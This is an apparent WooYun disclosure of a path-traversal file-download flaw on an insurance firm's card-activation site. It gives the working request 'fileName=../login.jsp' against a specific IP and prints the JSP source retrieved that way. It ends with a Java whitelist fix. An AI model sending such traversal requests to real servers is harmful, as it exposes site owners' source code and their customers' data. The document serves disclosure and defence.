WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-09-22: Details reported to the vendor, awaiting vendor handling. 2015-09-27: Vendor actively ignored the vulnerability; details disclosed to the public.
Arbitrary file download
http://1.85.2.249/online/web/sale/card/login.jsp
I noticed one spot where clicking downloads a PDF: http://1.85.2.249/online/sale/card/downloadPage.do?fileName=190.pdf. I replaced the trailing file name and first tested with index.jsp. I used Firefox for the test.
index.jsp
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <base href="<%=basePath%>">
    <title>JasperReport事例</title>
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="cache-control" content="no-cache">
    <meta http-equiv="expires" content="0">
    <meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
    <meta http-equiv="description" content="This is my page">
    <!-- <link rel="stylesheet" type="text/css" href="styles.css"> -->
  </head>
  <body>
    <s:form action="iReport.action">
      报表格式: <s:select name="formatType" list="#{'HTML':'HTML','PDF':'PDF','XLS':'XLS','RTF':'RTF'}"></s:select>
      <s:submit value="确定"/>
    </s:form>
    <s:form action="iReport2.action">
      <s:submit value="下载"/>
    </s:form>
    <s:form action="toPrint.action">
      <s:submit value="打印"/>
    </s:form>
  </body>
</html>
Next I downloaded the login.jsp behind http://1.85.2.249/online/web/sale/card/login.jsp via http://1.85.2.249/online/sale/card/downloadPage.do?fileName=../login.jsp
login.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ include file="/common/taglibs.jsp" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <title>永安保险</title>
  <link href="${ctx }/css/common/formCheck.css" type="text/css" rel="stylesheet" />
  <link href="${ctx }/css/cssCard/master.css" type="text/css" rel="stylesheet"/>
  <script type="text/javascript" src="${ctx}/js/jquery-1.6.2.min.js"></script>
  <script type="text/javascript" src="${ctx }/web/sale/card/js/common.js"></script>
  <script type="text/javascript" src="${ctx }/js/checkform/formCheck.validation.js"></script>
  <script type="text/javascript" src="${ctx }/js/checkform/formCheck.extend.js"></script>
  <script type="text/javascript" src="${ctx }/js/trimForm.js"></script>
  <script type="text/javascript" src="${ctx}/js/public/common.js"></script>
  <script>
    <%-- google web Analytics --%>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
    ga('create', 'UA-49712039-1', '1.85.2.249');
    ga('send', 'pageview');
  </script>
</head>
<%@ include file="/common/service/messageLayer.jsp"%>
<body class="body_bg">
<input id="cardmsg" type="hidden" value="${errormsg }"/>
<div class="index_bg">
  <div id="header">
    <div class="top"> </div>
    <div class="logo"><a href="#" title="永安保险"><img src="${ctx }/images/imagesCard/logo.gif" width="321" height="48" alt="永安保险"/></a></div>
    <div class="clear"></div>
  </div>
  <div id="content">
    <div class="insure_left">
      <div class="l"> <img width="240" height="60" src="${ctx }/images/imagesCard/cardServices.gif"> </div>
      <div class="l margT10 margB10"> <img width="240" height="37" src="${ctx }/images/imagesCard/activeOnline.gif"> </div>
      <%@ include file="/web/sale/card/common/menu.jsp" %>
    </div>
    <div class="insure_right">
      <span class="bg_1"></span>
      <div class="auto_fast">
        <h2>您现在的位置:保险卡 > 保险卡激活</h2>
        <div class="clear"></div>
        <div class="auto_vehicle">
          <dl> <dt><span>请输入您的卡号及密码</span></dt> </dl>
          <div class="info">
            <form id="subFm" action="${ctx }/sale/card/login.do" method="post">
              <ul>
                <li></li>
                <li><label><b class="col_e83">*</b>卡 号</label><input id="quoteNo" name="geQuoteMain.cardNo" type="text" class="input_text" bind="focus" tipmsg="请输入卡号" tipid="quoteNo_tip" trim cType="notEmpty|myRule" errmsg="不允许为空|格式不正确"/> <span id="quoteNo_tip" style="position: absolute;"></span> </li>
                <li><label><b class="col_e83">*</b>密 码</label><input id="pwd" name="geQuoteMain.flag" type="password" class="input_text" bind="focus" tipmsg="请输入密码" tipid="pwd_tip" trim cType="notEmpty|regexp" regexp="^[0-9]{1,10}$" errmsg="不允许为空|格式不正确"/> <span id="pwd_tip" style="position: absolute;"></span> </li>
                <li style="position: relative;"><label>验证码</label><input class="input_check" type="text" name="input" id="rand"> <a href="javascript:changeImage();"><img id="randImge" src="${ctx }/CreateImage" style="position:absolute;left: 335px;top:0"/></a> <span id="rand_tip" tipresult="false" style="position: absolute;left:380px"></span> </li>
              </ul>
              <div class="button_login"> <a href="javascript:subForm();" class="vip_login"> </a></div>
              <div class="clear"></div>
            </form>
          </div>
          <div class="active_steps_wrap">● 激活流程
            <div class="active_steps">
              <dl> 1.输入保险卡卡号及密码</dl>
              <span class="l" style="font-weight: normal;padding-top: 12px">></span>
              <dl>2.阅读“投保说明”</dl>
              <span class="l" style="font-weight: normal;padding-top: 12px">></span>
              <dl>3.填写激活信息</dl><span class="arrow"> </span>
              <div class="clear"></div>
              <dl>6.下载电子保单</dl>
              <span class="l" style="font-weight: normal;padding-top: 12px"><</span>
              <dl>5.激活成功</dl>
              <span class="l" style="font-weight: normal;padding-top: 12px"><</span>
              <dl>4.保单信息确认</dl>
              <div class="clear"></div>
            </div>
            <div class="clear"></div>
          </div>
        </div>
        <br>
        <div> <dl> <dt> <span style="color:#FF6600"> 提示:尊敬的客户,为了使您在激活流程中获得较好的体验,请使用IE高版本及其他主流浏览器。 </span> </dt> </dl> </div>
      </div>
      <span class="bg_2"></span>
    </div>
    <div class="clear"></div>
    <%@include file="/web/sale/card/common/foot.jsp" %>
  </div>
  <div id="footer">版权所有 © 永安财产保险股份有限公司</div>
</div>
</body>
<script type="text/javascript">
$(function(){
  var errormsg = $("#cardmsg").val();
  if(errormsg != null && errormsg != ''){ showError(errormsg); }
})
var check = new SFEC();
$(document).ready(function(){
  check.setForm("subFm");
  check.addRule('myRule',function(obj){ return /[0-9]{1,12}/.test($(obj).val()); });
  check.start();
});
function changeImage(){ $("#randImge").attr("src","${ctx}/CreateImage?"+ Math.random());}
/** AJAX captcha check **/
function checkCode() {
  var dataFlag = false;
  $.ajax({
    type : "POST",
    async : false,
    url : '${ctx}/sale/card/checkAjax.do?temp='+new Date().getTime(),
    dataType : 'text',
    data : {checkCode : $("#rand").val()},
    success : function(data){
      if($.trim(data) == "success") { dataFlag = true; } else { dataFlag = false; }
    }
  });
  return dataFlag;
}
function subForm(){
  if(check.result(true)){
    if(checkCode()){
      // submit the form
      $("#subFm").submit();
    }else{
      // wrong captcha
      $("#rand_tip").text("验证码输入错误");
      changeImage();
      $("#rand").val("");
    }
  }
}
</script>
</body>
</html>
Whitelist
Severity: no impact (vendor ignored)
Ignored at: 2015-09-27 11:06
Vulnerability Rank: 15 (WooYun rating)
None
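The whitelist fix suggested above, as an added example that is not the vendor's code: the file-name resolver a Struts action such as downloadPage.do should call before streaming a file, so that "../login.jsp" is refused while "190.pdf" is served. The class name, the temp-directory layout and the exact digits-plus-".pdf" pattern are assumptions for this illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.regex.Pattern;

public final class SafeDownload {
    // Whitelist the exact shape this endpoint serves (e.g. "190.pdf"):
    // digits plus a fixed extension, so "../login.jsp" cannot even match.
    private static final Pattern ALLOWED = Pattern.compile("^[0-9]{1,10}\\.pdf$");

    /** Returns the file to stream back, or null when the request must be refused (400/404). */
    public static Path resolve(Path pdfDir, String fileName) {
        if (fileName == null || !ALLOWED.matcher(fileName).matches()) {
            return null;
        }
        try {
            Path base = pdfDir.toRealPath();                 // canonical PDF directory
            Path real = base.resolve(fileName).toRealPath(); // follows symlinks, throws if missing
            // Defence in depth: the resolved file must be a direct child of the PDF directory,
            // so a loosened regex or a symlink planted in the directory still cannot escape it.
            if (!base.equals(real.getParent()) || !Files.isRegularFile(real)) {
                return null;
            }
            return real;
        } catch (IOException e) {
            return null;                                     // missing file or unreadable path
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout (assumption): <tmp>/web/login.jsp next to <tmp>/web/pdf/190.pdf,
        // mirroring a JSP that sits one level above the download directory.
        Path web = Files.createTempDirectory("web");
        Path pdfDir = Files.createDirectories(web.resolve("pdf"));
        Files.createFile(pdfDir.resolve("190.pdf"));
        Files.createFile(web.resolve("login.jsp"));

        String[] requests = {"190.pdf", "../login.jsp", "190.pdf/../../login.jsp", "191.pdf"};
        for (String r : requests) {
            Path p = resolve(pdfDir, r);
            System.out.println(r + " -> " + (p == null ? "REJECTED" : "serve " + p.getFileName()));
        }
    }
}
```

Only the first request is served; the traversal attempts fail the pattern check and the non-existent "191.pdf" fails the canonical-path check, so the handler never touches a path outside pdfDir.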